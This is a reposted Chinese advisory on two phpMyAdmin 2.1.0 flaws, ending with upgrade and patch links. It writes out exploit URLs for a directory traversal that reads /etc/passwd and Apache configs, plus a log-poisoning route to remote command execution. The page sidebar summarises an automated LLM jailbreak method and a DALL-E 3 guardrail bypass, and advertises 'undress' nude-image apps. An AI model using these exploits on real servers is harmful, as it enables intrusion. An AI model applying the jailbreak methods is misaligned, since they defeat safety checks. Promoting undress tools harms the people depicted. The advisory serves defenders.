Home Backend Development PHP Tutorial phpMyAdmin2.1.0存在两个漏洞_PHP

phpMyAdmin2.1.0存在两个漏洞_PHP

Jun 01, 2016 pm 12:25 PM
goto exist loopholes

phpmyadminphpMyAdmin漏洞

phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本:
phpMyAdmin 2.2.0。



1、目录遍历漏洞

攻击者通过提供如下的 URL:

http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)

http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd

能非法访问系统文件

有问题的代码在:
'include($goto);' in sql.php and in tbl_replace.php.

2、执行攻击者代码漏洞

通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。

首先,得到 Apache 配置文件以便知道日志文件存储位置:

http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No

可以看出,日志放在:
/var/log/httpd/error_log
/var/log/httpd/access_log

然后 telnet 到 端口80

# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is '^]'.
GET


^]
telnet> quit
Connection closed.
#

在 GET 请求之后,攻击者能将任意 PHP 代码上传

现在,可以用 Apache 用户身份远程运行命令了:

http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20-l%20/

受影响系统:
phpMyAdmin 2.1.0

解决方案:
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff

摘自:52w.net
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Repo: How To Revive Teammates
4 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
4 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Jailbreak any large model in 20 steps! More 'grandma loopholes' are discovered automatically Jailbreak any large model in 20 steps! More 'grandma loopholes' are discovered automatically Nov 05, 2023 pm 08:13 PM

In less than a minute and no more than 20 steps, you can bypass security restrictions and successfully jailbreak a large model! And there is no need to know the internal details of the model - only two black box models need to interact, and the AI ​​can fully automatically defeat the AI ​​and speak dangerous content. I heard that the once-popular "Grandma Loophole" has been fixed: Now, facing the "Detective Loophole", "Adventurer Loophole" and "Writer Loophole", what response strategy should artificial intelligence adopt? After a wave of onslaught, GPT-4 couldn't stand it anymore, and directly said that it would poison the water supply system as long as... this or that. The key point is that this is just a small wave of vulnerabilities exposed by the University of Pennsylvania research team, and using their newly developed algorithm, AI can automatically generate various attack prompts. Researchers say this method is better than existing

How to solve common file upload vulnerabilities in PHP language development? How to solve common file upload vulnerabilities in PHP language development? Jun 10, 2023 am 11:10 AM

In the development of web applications, the file upload function has become a basic requirement. This feature allows users to upload their own files to the server and then store or process them on the server. However, this feature also makes developers need to pay more attention to a security vulnerability: the file upload vulnerability. Attackers can attack the server by uploading malicious files, causing the server to suffer varying degrees of damage. PHP language is one of the languages ​​widely used in web development, and file upload vulnerabilities are also one of the common security issues. This article will introduce

Buffer overflow vulnerability in Java and its harm Buffer overflow vulnerability in Java and its harm Aug 09, 2023 pm 05:57 PM

Buffer overflow vulnerabilities in Java and their harm Buffer overflow means that when we write more data to a buffer than its capacity, it will cause data to overflow to other memory areas. This overflow behavior is often exploited by hackers, which can lead to serious consequences such as abnormal code execution and system crash. This article will introduce buffer overflow vulnerabilities and their harm in Java, and give code examples to help readers better understand. The buffer classes widely used in Java include ByteBuffer, CharBuffer, and ShortB

What are pointers in Python? Do pointers exist in Python? What are pointers in Python? Do pointers exist in Python? Aug 19, 2023 am 11:09 AM

Low-level programming languages, such as C or C++, often use pointers to directly manipulate memory. They enable efficient memory management and low-level data operations. Thelow-levelcomplexitiesofmemoryadministrationareabstractedawayinPython,ahigh-levellanguage.Becauseofthis,PythonlacksexpresspointersinanequalmannerthatCorC++.Asanalternative,Pythonmakesuseofanideacompa

The OpenAI DALL-E 3 model has a vulnerability that generates 'inappropriate content.' A Microsoft employee reported it and was slapped with a 'gag order.' The OpenAI DALL-E 3 model has a vulnerability that generates 'inappropriate content.' A Microsoft employee reported it and was slapped with a 'gag order.' Feb 04, 2024 pm 02:40 PM

According to news on February 2, Shane Jones, manager of Microsoft’s software engineering department, recently discovered a vulnerability in OpenAI’s DALL-E3 model, which is said to be able to generate a series of inappropriate content. Shane Jones reported the vulnerability to the company, but was asked to keep it confidential. However, he eventually decided to disclose the vulnerability to the outside world. ▲Image source: Report disclosed by ShaneJones. This site noticed that ShaneJones discovered through independent research in December last year that there was a vulnerability in the DALL-E3 model of OpenAI text-generated images. This vulnerability can bypass the AI ​​Guardrail (AIGuardrail), resulting in the generation of a series of NSFW inappropriate content. This discovery attracted widespread attention

Comma operator vulnerabilities and protective measures in Java Comma operator vulnerabilities and protective measures in Java Aug 10, 2023 pm 02:21 PM

Overview of Comma Operator Vulnerabilities and Defense Measures in Java: In Java programming, we often use the comma operator to perform multiple operations at the same time. However, sometimes we may overlook some potential vulnerabilities of the comma operator that may lead to unexpected results. This article will introduce the vulnerabilities of the comma operator in Java and provide corresponding protective measures. Usage of comma operator: The syntax of comma operator in Java is expr1, expr2, which can be said to be a sequence operator. Its function is to first calculate ex

What is the meaning of goto statement in c language What is the meaning of goto statement in c language Dec 22, 2022 pm 06:00 PM

In the C language, the goto statement is called an unconditional transfer statement, which allows unconditional transfer of control to a labeled statement within the same function; the syntax is "goto label;...label: statement;", where label can be anything except C Plain text other than keywords, which can be set before or after the goto statement in a C program.

Very comprehensive! Summary of common PHP vulnerability codes! Very comprehensive! Summary of common PHP vulnerability codes! Jan 20, 2023 pm 02:22 PM

This article brings you relevant knowledge about PHP vulnerabilities. It mainly summarizes and introduces the common vulnerability codes of PHP. It is very comprehensive and detailed. Let’s take a look at it together. I hope it will be helpful to friends in need.

See all articles